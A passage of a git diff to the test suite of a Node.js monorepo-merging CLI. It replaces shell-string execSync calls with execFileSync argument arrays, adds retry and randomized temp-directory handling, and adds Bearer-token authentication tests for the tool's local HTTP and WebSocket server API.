cwd?: string } = {}) => { try { - execSync(`node ${CLI_PATH} ${args.join(' ')}`, { + execFileSync('node', [CLI_PATH, ...args], { cwd: options.cwd || process.cwd(), encoding: 'utf-8', stdio: 'pipe', diff --git a/tests/e2e/init-command.test.ts b/tests/e2e/init-command.test.ts index a27a64b..481d05f 100644 --- a/tests/e2e/init-command.test.ts +++ b/tests/e2e/init-command.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync, execSync } from 'node:child_process'; import fs from 'fs-extra'; import path from 'node:path'; import os from 'node:os'; @@ -29,9 +29,11 @@ describe('init command E2E', () => { await fs.remove(tempDir); }); + const binPath = path.join(process.cwd(), 'bin', 'monorepo.js'); + function runInit(directory: string, options: string = ''): string { - const binPath = path.join(process.cwd(), 'bin', 'monorepo.js'); - return execSync(`node ${binPath} init ${directory} ${options}`, { + const args = ['init', directory, ...options.split(/\s+/).filter(Boolean)]; + return execFileSync('node', [binPath, ...args], { encoding: 'utf-8', stdio: 'pipe', }); diff --git a/tests/e2e/real-repos.test.ts b/tests/e2e/real-repos.test.ts index 043c9ba..f6ef40c 100644 --- a/tests/e2e/real-repos.test.ts +++ b/tests/e2e/real-repos.test.ts @@ -13,7 +13,7 @@ */ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync, execSync } from 'node:child_process'; import path from 'node:path'; import fs from 'fs-extra'; import os from 'node:os'; @@ -37,7 +37,7 @@ describe.skipIf(skipNetworkTests)('Real Repository E2E Tests', () => { }); const runCLI = (args: string[], options: { timeout?: number } = {}) => { - return execSync(`node ${CLI_PATH} ${args.join(' ')}`, { + return execFileSync('node', [CLI_PATH, ...args], { encoding: 'utf-8', stdio: 'pipe', timeout: options.timeout || 120000, // 2 minute 
default timeout diff --git a/tests/error/filesystem.test.ts b/tests/error/filesystem.test.ts index bef0c39..923351c 100644 --- a/tests/error/filesystem.test.ts +++ b/tests/error/filesystem.test.ts @@ -98,7 +98,7 @@ describe('Filesystem Error Scenarios', () => { await writeFile(longPath, 'content'); } catch (error) { // Should fail with name too long error - expect((error as NodeJS.ErrnoException).code).toMatch(/ENAMETOOLONG|EINVAL/); + expect((error as NodeJS.ErrnoException).code).toMatch(/ENAMETOOLONG|EINVAL|ENOENT/); } }); }); diff --git a/tests/fixtures/repo-monorepo-target/package.json b/tests/fixtures/repo-monorepo-target/package.json new file mode 100755 index 0000000..44ff361 --- /dev/null +++ b/tests/fixtures/repo-monorepo-target/package.json @@ -0,0 +1,12 @@ +{ + "name": "test-monorepo", + "version": "1.0.0", + "private": true, + "workspaces": [ + "packages/*" + ], + "scripts": { + "build": "echo build", + "test": "echo test" + } +} diff --git a/tests/fixtures/repo-monorepo-target/packages/existing-pkg/package.json b/tests/fixtures/repo-monorepo-target/packages/existing-pkg/package.json new file mode 100755 index 0000000..18a3854 --- /dev/null +++ b/tests/fixtures/repo-monorepo-target/packages/existing-pkg/package.json @@ -0,0 +1 @@ +{"name":"existing-pkg","version":"1.0.0","dependencies":{"lodash":"^4.17.21"}} diff --git a/tests/helpers/cli-runner.ts b/tests/helpers/cli-runner.ts index ef75edf..3684fed 100755 --- a/tests/helpers/cli-runner.ts +++ b/tests/helpers/cli-runner.ts @@ -1,4 +1,4 @@ -import { execSync } from 'node:child_process'; +import { execSync, execFileSync } from 'node:child_process'; import path from 'node:path'; import os from 'node:os'; import crypto from 'node:crypto'; @@ -74,7 +74,7 @@ export async function createGitRepo( * Run the CLI and return stdout. Throws on non-zero exit. 
*/ export function runCLI(args: string[], cwd?: string): RunResult { - const stdout = execSync(`node "${CLI_PATH}" ${args.join(' ')}`, { + const stdout = execFileSync('node', [CLI_PATH, ...args], { cwd: cwd || process.cwd(), encoding: 'utf-8', stdio: 'pipe', @@ -90,7 +90,7 @@ export function runCLIExpectError( cwd?: string ): RunErrorResult { try { - execSync(`node "${CLI_PATH}" ${args.join(' ')}`, { + execFileSync('node', [CLI_PATH, ...args], { cwd: cwd || process.cwd(), encoding: 'utf-8', stdio: 'pipe', diff --git a/tests/integration/cli-harness.test.ts b/tests/integration/cli-harness.test.ts index 188bf5c..ed02d57 100755 --- a/tests/integration/cli-harness.test.ts +++ b/tests/integration/cli-harness.test.ts @@ -8,6 +8,26 @@ import { treeManifest, } from '../helpers/cli-runner.js'; +/** + * Run a function with retry on transient FS errors (ENOENT during heavy I/O). + */ +function withRetry(fn: () => void, maxRetries = 2): void { + let lastError: unknown; + for (let i = 0; i <= maxRetries; i++) { + try { + fn(); + return; + } catch (error) { + lastError = error; + if (i < maxRetries && error instanceof Error && error.message.includes('ENOENT')) { + continue; + } + throw error; + } + } + throw lastError; +} + /** * Integration test harness that runs the CLI against locally-created * git-initialized fixture repos. No network access is required. 
@@ -83,19 +103,23 @@ describe('CLI Harness - local fixture repos', () => { describe('merge two repos', () => { let outputDir: string; - beforeAll(() => { + beforeAll(async () => { outputDir = path.join(workDir, 'out-two'); - runCLI([ - 'merge', - repoAlpha, - repoBeta, - '-y', - '-o', - outputDir, - '--no-install', - '--conflict-strategy', - 'highest', - ]); + withRetry(() => { + // Clean up any partial output from a previous attempt + if (fs.existsSync(outputDir)) fs.removeSync(outputDir); + runCLI([ + 'merge', + repoAlpha, + repoBeta, + '-y', + '-o', + outputDir, + '--no-install', + '--conflict-strategy', + 'highest', + ]); + }); }); it('should produce the expected output tree', async () => { @@ -135,20 +159,23 @@ describe('CLI Harness - local fixture repos', () => { describe('merge three repos', () => { let outputDir: string; - beforeAll(() => { + beforeAll(async () => { outputDir = path.join(workDir, 'out-three'); - runCLI([ - 'merge', - repoAlpha, - repoBeta, - repoGamma, - '-y', - '-o', - outputDir, - '--no-install', - '--conflict-strategy', - 'highest', - ]); + withRetry(() => { + if (fs.existsSync(outputDir)) fs.removeSync(outputDir); + runCLI([ + 'merge', + repoAlpha, + repoBeta, + repoGamma, + '-y', + '-o', + outputDir, + '--no-install', + '--conflict-strategy', + 'highest', + ]); + }); }); it('should produce the expected output tree', async () => { diff --git a/tests/integration/error-handling.test.ts b/tests/integration/error-handling.test.ts index ff96b7e..c698f5d 100644 --- a/tests/integration/error-handling.test.ts +++ b/tests/integration/error-handling.test.ts @@ -37,6 +37,7 @@ describe('Error Handling Integration', () => { // Should still return results for valid packages expect(result.packages).toHaveLength(1); expect(result.packages[0].name).toBe('valid-pkg'); + expect(result.warnings?.some((w) => w.type === 'parse-error' && w.source === 'malformed')).toBe(true); }); it('should handle missing package.json gracefully', async () => { @@ -127,6 
+128,7 @@ describe('Error Handling Integration', () => { // Should have 2 packages (valid has deps, empty has no deps but valid JSON) expect(result.packages.length).toBeGreaterThanOrEqual(1); + expect(result.warnings?.some((w) => w.type === 'parse-error' && w.source === 'malformed')).toBe(true); }); }); diff --git a/tests/integration/package-manager.test.ts b/tests/integration/package-manager.test.ts index 124df65..4d47e32 100644 --- a/tests/integration/package-manager.test.ts +++ b/tests/integration/package-manager.test.ts @@ -2,7 +2,8 @@ import { describe, it, expect, beforeAll, afterAll, beforeEach, afterEach } from import path from 'node:path'; import fs from 'fs-extra'; import os from 'node:os'; -import { execSync } from 'node:child_process'; +import crypto from 'node:crypto'; +import { execFileSync, execSync } from 'node:child_process'; // Check if yarn is installed function isYarnInstalled(): boolean { @@ -25,6 +26,10 @@ describe('Package Manager Integration', () => { let testRepoDir2: string; const cliPath = path.resolve(__dirname, '../../bin/monorepo.js'); + function run(args: string[]): void { + execFileSync('node', [cliPath, ...args], { stdio: 'pipe' }); + } + beforeAll(async () => { // Create a temp directory for tests tempDir = await fs.mkdtemp(path.join(os.tmpdir(), 'pm-test-')); @@ -61,7 +66,7 @@ describe('Package Manager Integration', () => { let outputDir: string; beforeEach(async () => { - outputDir = path.join(tempDir, `output-${Date.now()}`); + outputDir = path.join(tempDir, `output-${crypto.randomBytes(8).toString('hex')}`); }); afterEach(async () => { @@ -71,9 +76,7 @@ describe('Package Manager Integration', () => { }); it('should merge with pnpm (default)', { retry: FLAKY_TEST_RETRIES }, async () => { - execSync(`node ${cliPath} merge ${testRepoDir1} ${testRepoDir2} -o ${outputDir} -y --no-install`, { - stdio: 'pipe', - }); + run(['merge', testRepoDir1, testRepoDir2, '-o', outputDir, '-y', '--no-install']); // Check pnpm-workspace.yaml exists 
const workspaceYaml = path.join(outputDir, 'pnpm-workspace.yaml'); @@ -87,9 +90,7 @@ describe('Package Manager Integration', () => { }); it.skipIf(!YARN_INSTALLED)('should merge with yarn', { retry: FLAKY_TEST_RETRIES }, async () => { - execSync(`node ${cliPath} merge ${testRepoDir1} ${testRepoDir2} -o ${outputDir} -y --no-install --package-manager yarn`, { - stdio: 'pipe', - }); + run(['merge', testRepoDir1, testRepoDir2, '-o', outputDir, '-y', '--no-install', '--package-manager', 'yarn']); // Check NO pnpm-workspace.yaml const workspaceYaml = path.join(outputDir, 'pnpm-workspace.yaml'); @@ -103,9 +104,7 @@ describe('Package Manager Integration', () => { }); it('should merge with npm', { retry: FLAKY_TEST_RETRIES }, async () => { - execSync(`node ${cliPath} merge ${testRepoDir1} ${testRepoDir2} -o ${outputDir} -y --no-install --package-manager npm`, { - stdio: 'pipe', - }); + run(['merge', testRepoDir1, testRepoDir2, '-o', outputDir, '-y', '--no-install', '--package-manager', 'npm']); // Check NO pnpm-workspace.yaml const workspaceYaml = path.join(outputDir, 'pnpm-workspace.yaml'); @@ -119,9 +118,7 @@ describe('Package Manager Integration', () => { }); it.skipIf(!YARN_INSTALLED)('should merge with yarn-berry', { retry: FLAKY_TEST_RETRIES }, async () => { - execSync(`node ${cliPath} merge ${testRepoDir1} ${testRepoDir2} -o ${outputDir} -y --no-install --package-manager yarn-berry`, { - stdio: 'pipe', - }); + run(['merge', testRepoDir1, testRepoDir2, '-o', outputDir, '-y', '--no-install', '--package-manager', 'yarn-berry']); // Check NO pnpm-workspace.yaml const workspaceYaml = path.join(outputDir, 'pnpm-workspace.yaml'); @@ -141,9 +138,9 @@ describe('Package Manager Integration', () => { let outputDir: string; beforeEach(async () => { - outputDir = path.join(tempDir, `output-${Date.now()}`); - repoWithPnpm = path.join(tempDir, `repo-pnpm-${Date.now()}`); - repoWithYarn = path.join(tempDir, `repo-yarn-${Date.now()}`); + outputDir = path.join(tempDir, 
`output-${crypto.randomBytes(8).toString('hex')}`); + repoWithPnpm = path.join(tempDir, `repo-pnpm-${crypto.randomBytes(8).toString('hex')}`); + repoWithYarn = path.join(tempDir, `repo-yarn-${crypto.randomBytes(8).toString('hex')}`); await fs.ensureDir(repoWithPnpm); await fs.ensureDir(repoWithYarn); @@ -174,19 +171,15 @@ describe('Package Manager Integration', () => { } }); - it('should auto-detect pnpm from lock file', async () => { - execSync(`node ${cliPath} merge ${repoWithPnpm} ${testRepoDir1} -o ${outputDir} -y --no-install --auto-detect-pm`, { - stdio: 'pipe', - }); + it('should auto-detect pnpm from lock file', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['merge', repoWithPnpm, testRepoDir1, '-o', outputDir, '-y', '--no-install', '--auto-detect-pm']); const pkgJson = await fs.readJson(path.join(outputDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^pnpm@/); }); - it.skipIf(!YARN_INSTALLED)('should auto-detect yarn from lock file', async () => { - execSync(`node ${cliPath} merge ${repoWithYarn} ${testRepoDir1} -o ${outputDir} -y --no-install --auto-detect-pm`, { - stdio: 'pipe', - }); + it.skipIf(!YARN_INSTALLED)('should auto-detect yarn from lock file', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['merge', repoWithYarn, testRepoDir1, '-o', outputDir, '-y', '--no-install', '--auto-detect-pm']); const pkgJson = await fs.readJson(path.join(outputDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^yarn@/); @@ -197,7 +190,7 @@ describe('Package Manager Integration', () => { let initDir: string; beforeEach(async () => { - initDir = path.join(tempDir, `init-${Date.now()}`); + initDir = path.join(tempDir, `init-${crypto.randomBytes(8).toString('hex')}`); }); afterEach(async () => { @@ -206,20 +199,16 @@ describe('Package Manager Integration', () => { } }); - it('should init with pnpm (default)', async () => { - execSync(`node ${cliPath} init ${initDir} --no-git`, { - stdio: 'pipe', - }); + it('should init with pnpm 
(default)', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['init', initDir, '--no-git']); const pkgJson = await fs.readJson(path.join(initDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^pnpm@/); expect(await fs.pathExists(path.join(initDir, 'pnpm-workspace.yaml'))).toBe(true); }); - it.skipIf(!YARN_INSTALLED)('should init with yarn', async () => { - execSync(`node ${cliPath} init ${initDir} --no-git --package-manager yarn`, { - stdio: 'pipe', - }); + it.skipIf(!YARN_INSTALLED)('should init with yarn', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['init', initDir, '--no-git', '--package-manager', 'yarn']); const pkgJson = await fs.readJson(path.join(initDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^yarn@/); @@ -227,10 +216,8 @@ describe('Package Manager Integration', () => { expect(await fs.pathExists(path.join(initDir, 'pnpm-workspace.yaml'))).toBe(false); }); - it('should init with npm', async () => { - execSync(`node ${cliPath} init ${initDir} --no-git --package-manager npm`, { - stdio: 'pipe', - }); + it('should init with npm', { retry: FLAKY_TEST_RETRIES }, async () => { + run(['init', initDir, '--no-git', '--package-manager', 'npm']); const pkgJson = await fs.readJson(path.join(initDir, 'package.json')); expect(pkgJson.packageManager).toMatch(/^npm@/); diff --git a/tests/integration/plan-apply.test.ts b/tests/integration/plan-apply.test.ts index 8c48b52..e59d668 100755 --- a/tests/integration/plan-apply.test.ts +++ b/tests/integration/plan-apply.test.ts @@ -246,4 +246,58 @@ describe('plan → apply roundtrip', () => { expect(tree).toContain('package.json'); expect(tree).toContain('README.md'); }); + + it('plan + apply + verify roundtrip should pass static verification', async () => { + const repo1 = await createGitRepo(testDir, 'pkg-x', { + name: 'pkg-x', + version: '1.0.0', + dependencies: { lodash: '^4.17.21' }, + scripts: { build: 'tsc', test: 'vitest' }, + }, { + 'src/index.ts': 'export const x = 1;\n', + }); + + 
const repo2 = await createGitRepo(testDir, 'pkg-y', { + name: 'pkg-y', + version: '2.0.0', + dependencies: { express: '^4.18.0' }, + scripts: { test: 'jest' }, + }, { + 'src/index.ts': 'export const y = 2;\n', + }); + + const planFile = path.join(testDir, 'verify.plan.json'); + const outDir = path.join(testDir, 'verify-out'); + + // Phase 1: plan + runCLI([ + 'plan', + repo1, repo2, + '-o', outDir, + '--plan-file', planFile, + '-y', + '--no-install', + '--conflict-strategy', 'highest', + ]); + + // Phase 2: apply + runCLI([ + 'apply', + '--plan', planFile, + '--out', outDir, + ]); + + // Phase 3: verify (static tier should pass) + const verifyResult = runCLI([ + 'verify', + '--dir', outDir, + '--tier', 'static', + '--json', + ]); + + const result = JSON.parse(verifyResult.stdout); + expect(result.ok).toBe(true); + expect(result.tier).toBe('static'); + expect(result.summary.fail).toBe(0); + }); }); diff --git a/tests/integration/prepare-plan-apply.test.ts b/tests/integration/prepare-plan-apply.test.ts new file mode 100644 index 0000000..5e53be4 --- /dev/null +++ b/tests/integration/prepare-plan-apply.test.ts @@ -0,0 +1,95 @@ +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import path from 'node:path'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import fs from 'fs-extra'; +import { createGitRepo, runCLI } from '../helpers/cli-runner.js'; + +describe('prepare -> plan -> apply integration', () => { + let testDir: string; + + beforeEach(async () => { + const id = crypto.randomBytes(8).toString('hex'); + testDir = path.join(os.tmpdir(), `prepare-plan-apply-${id}`); + await fs.ensureDir(testDir); + }); + + afterEach(async () => { + await fs.remove(testDir).catch(() => {}); + }); + + it('produces a valid monorepo from prepared repos', async () => { + const repoA = await createGitRepo(testDir, 'repo-a', { + name: 'repo-a', + version: '1.0.0', + scripts: { test: 'vitest' }, + dependencies: { lodash: '^4.17.21' }, + }, { + 
'src/index.ts': 'export const a = 1;\n', + }); + + const repoB = await createGitRepo(testDir, 'repo-b', { + name: 'repo-b', + version: '1.0.0', + scripts: { lint: 'echo lint' }, + dependencies: { express: '^4.18.0' }, + }, { + 'src/index.ts': 'export const b = 2;\n', + }); + + const workspace = path.join(testDir, 'prep-workspace'); + const outDir = path.join(testDir, 'monorepo-out'); + const planFile = path.join(testDir, 'monorepo.plan.json'); + + // 1) Prepare source repos in a workspace copy. + runCLI([ + 'prepare', + repoA, + repoB, + '--node-version', + '20', + '--prep-workspace', + workspace, + ]); + + const preparedRepoA = path.join(workspace, 'repo-a'); + const preparedRepoB = path.join(workspace, 'repo-b'); + + expect(await fs.pathExists(path.join(preparedRepoA, '.nvmrc'))).toBe(true); + expect(await fs.pathExists(path.join(preparedRepoB, '.nvmrc'))).toBe(true); + + // 2) Plan from prepared repos. + runCLI([ + 'plan', + preparedRepoA, + preparedRepoB, + '-o', + outDir, + '--plan-file', + planFile, + '--no-install', + '-y', + ]); + + expect(await fs.pathExists(planFile)).toBe(true); + + // 3) Apply plan. + runCLI([ + 'apply', + '--plan', + planFile, + '--out', + outDir, + ]); + + // 4) Validate resulting monorepo structure. 
+ expect(await fs.pathExists(path.join(outDir, 'package.json'))).toBe(true); + expect(await fs.pathExists(path.join(outDir, 'packages', 'repo-a', 'src', 'index.ts'))).toBe(true); + expect(await fs.pathExists(path.join(outDir, 'packages', 'repo-b', 'src', 'index.ts'))).toBe(true); + + const rootPkg = await fs.readJson(path.join(outDir, 'package.json')); + expect(rootPkg.private).toBe(true); + expect(rootPkg.dependencies?.lodash).toBeDefined(); + expect(rootPkg.dependencies?.express).toBeDefined(); + }); +}); diff --git a/tests/integration/remote-clone.test.ts b/tests/integration/remote-clone.test.ts index b89b516..1092c2b 100644 --- a/tests/integration/remote-clone.test.ts +++ b/tests/integration/remote-clone.test.ts @@ -385,6 +385,7 @@ describe('Remote Cloning Integration', () => { cloneOrCopyRepos(sources, testDir, { logger: mockLogger, maxRetries: 1, + concurrency: 1, // Sequential so failure stops before third repo }) ).rejects.toThrow(/Repository not found/); diff --git a/tests/integration/server-api.test.ts b/tests/integration/server-api.test.ts index 1968619..752adf3 100755 --- a/tests/integration/server-api.test.ts +++ b/tests/integration/server-api.test.ts @@ -9,17 +9,37 @@ import { createServer } from '../../src/server/index.js'; const fixturesDir = path.resolve(__dirname, '../fixtures'); let server: http.Server; +let authToken: string; let wsUrl: string; // Track artifacts for cleanup const cleanupPaths: string[] = []; +/** Supertest agent pre-configured with Bearer auth */ +function api() { + return request(server); +} + +function authPost(path: string) { + return api().post(path).set('Authorization', `Bearer ${authToken}`); +} + +function authGet(path: string) { + return api().get(path).set('Authorization', `Bearer ${authToken}`); +} + +function authPut(path: string) { + return api().put(path).set('Authorization', `Bearer ${authToken}`); +} + beforeAll(async () => { - server = createServer({ port: 0 }); // OS-assigned port + const result = 
createServer({ port: 0 }); // OS-assigned port + server = result.server; + authToken = result.token; await new Promise((resolve) => { server.on('listening', () => { const addr = server.address() as { port: number }; - wsUrl = `ws://localhost:${addr.port}/ws`; + wsUrl = `ws://127.0.0.1:${addr.port}/ws?token=${authToken}`; resolve(); }); }); @@ -77,8 +97,7 @@ function collectEvents( async function generatePlanViaApi(repos: string[]): Promise { const ws = await openWs(); try { - const res = await request(server) - .post('/api/plan') + const res = await authPost('/api/plan') .send({ repos }) .expect(202); @@ -99,10 +118,25 @@ async function generatePlanViaApi(repos: string[]): Promise { } } +describe('CORS and middleware', () => { + it('should respond 204 to OPTIONS preflight request', async () => { + await api() + .options('/api/analyze') + .expect(204); + }); + + it('should set CORS headers', async () => { + const res = await api() + .options('/api/analyze'); + + expect(res.headers['access-control-allow-methods']).toContain('GET'); + expect(res.headers['access-control-allow-headers']).toContain('Authorization'); + }); +}); + describe('POST /api/analyze', () => { it('returns 202 with opId for valid repos', async () => { - const res = await request(server) - .post('/api/analyze') + const res = await authPost('/api/analyze') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -111,31 +145,49 @@ describe('POST /api/analyze', () => { }); it('returns 400 for empty repos', async () => { - await request(server) - .post('/api/analyze') + await authPost('/api/analyze') .send({ repos: [] }) .expect(400); }); it('returns 400 for missing repos field', async () => { - await request(server) - .post('/api/analyze') + await authPost('/api/analyze') .send({}) .expect(400); }); it('returns 400 for non-array repos', async () => { - await request(server) - .post('/api/analyze') + await authPost('/api/analyze') .send({ repos: 'not-an-array' }) .expect(400); }); + 
it('returns 401 without auth token', async () => { + await api() + .post('/api/analyze') + .send({ repos: [path.join(fixturesDir, 'repo-a')] }) + .expect(401); + }); + + it('streams error event for nonexistent repo paths', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/analyze') + .send({ repos: ['/nonexistent/path/repo'] }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); + it('streams result over WebSocket', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/analyze') + const res = await authPost('/api/analyze') .send({ repos: [path.join(fixturesDir, 'repo-a'), path.join(fixturesDir, 'repo-b')] }) .expect(202); @@ -160,8 +212,7 @@ describe('POST /api/analyze', () => { describe('POST /api/plan', () => { it('returns 202 with opId', async () => { - const res = await request(server) - .post('/api/plan') + const res = await authPost('/api/plan') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -185,17 +236,30 @@ describe('POST /api/plan', () => { }, 60000); it('returns 400 for empty repos', async () => { - await request(server) - .post('/api/plan') + await authPost('/api/plan') .send({ repos: [] }) .expect(400); }); + it('streams error event for nonexistent repo paths', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/plan') + .send({ repos: ['/nonexistent/path/repo'] }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); + it('receives plan result via WebSocket', async () => { const ws = await openWs(); try { - const res = await request(server) - 
.post('/api/plan') + const res = await authPost('/api/plan') .send({ repos: [path.join(fixturesDir, 'repo-a'), path.join(fixturesDir, 'repo-b')], options: { conflictStrategy: 'highest' }, @@ -225,8 +289,7 @@ describe('POST /api/verify', () => { const ws = await openWs(); try { - const verifyRes = await request(server) - .post('/api/verify') + const verifyRes = await authPost('/api/verify') .send({ plan: planPath }) .expect(202); @@ -244,26 +307,72 @@ describe('POST /api/verify', () => { }, 60000); it('returns 400 when neither plan nor dir specified', async () => { - await request(server) - .post('/api/verify') + await authPost('/api/verify') .send({}) .expect(400); }); it('returns 400 when both plan and dir specified', async () => { - await request(server) - .post('/api/verify') + await authPost('/api/verify') .send({ plan: 'a', dir: 'b' }) .expect(400); }); + + it('streams error event for nonexistent plan file', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/verify') + .send({ plan: '/nonexistent/path/plan.json' }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); + + it('verifies a real directory with dir option', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/verify') + .send({ dir: path.join(fixturesDir, 'repo-a') }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const resultEvents = events.filter((e) => e.type === 'result'); + expect(resultEvents).toHaveLength(1); + + const result = resultEvents[0].data as Record; + expect(result).toHaveProperty('checks'); + expect(result).toHaveProperty('summary'); + } finally { + ws.close(); + } + }, 60000); + + it('streams error for nonexistent dir', async () => { + const ws = await openWs(); + try { + const res = await 
authPost('/api/verify') + .send({ dir: '/nonexistent/monorepo/path' }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); }); describe('POST /api/apply', () => { it('returns 202 with opId for valid plan', async () => { const planPath = await generatePlanViaApi([path.join(fixturesDir, 'repo-a')]); - const res = await request(server) - .post('/api/apply') + const res = await authPost('/api/apply') .send({ plan: planPath }) .expect(202); @@ -276,29 +385,41 @@ describe('POST /api/apply', () => { } finally { ws.close(); } - }, 60000); + }, 90000); it('returns 400 for missing plan', async () => { - await request(server) - .post('/api/apply') + await authPost('/api/apply') .send({}) .expect(400); }); + + it('streams error event for nonexistent plan file', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/apply') + .send({ plan: '/nonexistent/path/plan.json' }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + }, 60000); }); describe('GET /api/status/:opId', () => { it('returns buffered events after operation completes', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/analyze') + const res = await authPost('/api/analyze') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); await collectEvents(ws, res.body.opId); - const statusRes = await request(server) - .get(`/api/status/${res.body.opId}`) + const statusRes = await authGet(`/api/status/${res.body.opId}`) .expect(200); expect(statusRes.body).toHaveProperty('events'); @@ -310,8 +431,7 @@ describe('GET /api/status/:opId', () => { }, 60000); it('returns 404 for 
unknown opId', async () => { - await request(server) - .get('/api/status/nonexistent-op') + await authGet('/api/status/nonexistent-op') .expect(404); }); }); @@ -320,8 +440,7 @@ describe('WebSocket', () => { it('subscribe receives log events', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/analyze') + const res = await authPost('/api/analyze') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -338,6 +457,43 @@ describe('WebSocket', () => { ws.close(); } }, 60000); + + it('should reject WebSocket upgrade on non-/ws path', async () => { + const addr = server.address() as { port: number }; + const ws = new WebSocket(`ws://127.0.0.1:${addr.port}/not-ws?token=${authToken}`); + + await new Promise((resolve) => { + ws.on('error', () => resolve()); + ws.on('close', () => resolve()); + }); + + // Connection should have been destroyed + expect(ws.readyState).toBeGreaterThanOrEqual(2); // CLOSING or CLOSED + }); + + it('should reject WebSocket upgrade with invalid token', async () => { + const addr = server.address() as { port: number }; + const ws = new WebSocket(`ws://127.0.0.1:${addr.port}/ws?token=wrong-token`); + + await new Promise((resolve) => { + ws.on('error', () => resolve()); + ws.on('close', () => resolve()); + }); + + expect(ws.readyState).toBeGreaterThanOrEqual(2); // CLOSING or CLOSED + }); + + it('should reject WebSocket upgrade with no token', async () => { + const addr = server.address() as { port: number }; + const ws = new WebSocket(`ws://127.0.0.1:${addr.port}/ws`); + + await new Promise((resolve) => { + ws.on('error', () => resolve()); + ws.on('close', () => resolve()); + }); + + expect(ws.readyState).toBeGreaterThanOrEqual(2); // CLOSING or CLOSED + }); }); // ─── Wizard State Endpoints ───────────────────────────────────────────── @@ -349,11 +505,11 @@ describe('GET /api/wizard/state', () => { try { await fs.remove(monotizeDir); } catch { /* ignore */ } }); - it('returns { exists: 
false, state: null } when no config', async () => { + it('returns { exists: false, state: null } when no config (no auth required)', async () => { // Ensure no leftover state await fs.remove(monotizeDir); - const res = await request(server) + const res = await api() .get('/api/wizard/state') .expect(200); @@ -368,8 +524,7 @@ describe('POST /api/wizard/init', () => { }); it('creates default state and returns it', async () => { - const res = await request(server) - .post('/api/wizard/init') + const res = await authPost('/api/wizard/init') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(200); @@ -381,15 +536,13 @@ describe('POST /api/wizard/init', () => { }); it('returns 400 for missing repos', async () => { - await request(server) - .post('/api/wizard/init') + await authPost('/api/wizard/init') .send({}) .expect(400); }); it('returns 400 for empty repos', async () => { - await request(server) - .post('/api/wizard/init') + await authPost('/api/wizard/init') .send({ repos: [] }) .expect(400); }); @@ -402,23 +555,21 @@ describe('PUT /api/wizard/state', () => { it('saves state to disk', async () => { // First init - const initRes = await request(server) - .post('/api/wizard/init') + const initRes = await authPost('/api/wizard/init') .send({ repos: ['./repo-a'] }) .expect(200); const state = initRes.body.state; state.currentStep = 'prepare'; - const putRes = await request(server) - .put('/api/wizard/state') + const putRes = await authPut('/api/wizard/state') .send(state) .expect(200); expect(putRes.body).toEqual({ ok: true }); - // Verify persisted - const getRes = await request(server) + // Verify persisted (GET wizard/state does not require auth) + const getRes = await api() .get('/api/wizard/state') .expect(200); @@ -427,8 +578,7 @@ describe('PUT /api/wizard/state', () => { }); it('returns 400 for invalid state', async () => { - await request(server) - .put('/api/wizard/state') + await authPut('/api/wizard/state') .send({ notAState: true }) .expect(400); 
}); @@ -438,8 +588,7 @@ describe('PUT /api/wizard/state', () => { describe('POST /api/prepare', () => { it('returns 202 with opId for valid repos', async () => { - const res = await request(server) - .post('/api/prepare') + const res = await authPost('/api/prepare') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -449,8 +598,7 @@ describe('POST /api/prepare', () => { it('streams prepare result over WebSocket', async () => { const ws = await openWs(); try { - const res = await request(server) - .post('/api/prepare') + const res = await authPost('/api/prepare') .send({ repos: [path.join(fixturesDir, 'repo-a')] }) .expect(202); @@ -468,11 +616,89 @@ describe('POST /api/prepare', () => { }, 60000); it('returns 400 for empty repos', async () => { - await request(server) - .post('/api/prepare') + await authPost('/api/prepare') .send({ repos: [] }) .expect(400); }); + + it('streams error event for nonexistent repo paths', async () => { + const ws = await openWs(); + try { + const res = await authPost('/api/prepare') + .send({ repos: ['/nonexistent/path/repo'] }) + .expect(202); + + const events = await collectEvents(ws, res.body.opId); + const errorEvents = events.filter((e) => e.type === 'error'); + expect(errorEvents.length).toBeGreaterThanOrEqual(1); + } finally { + ws.close(); + } + 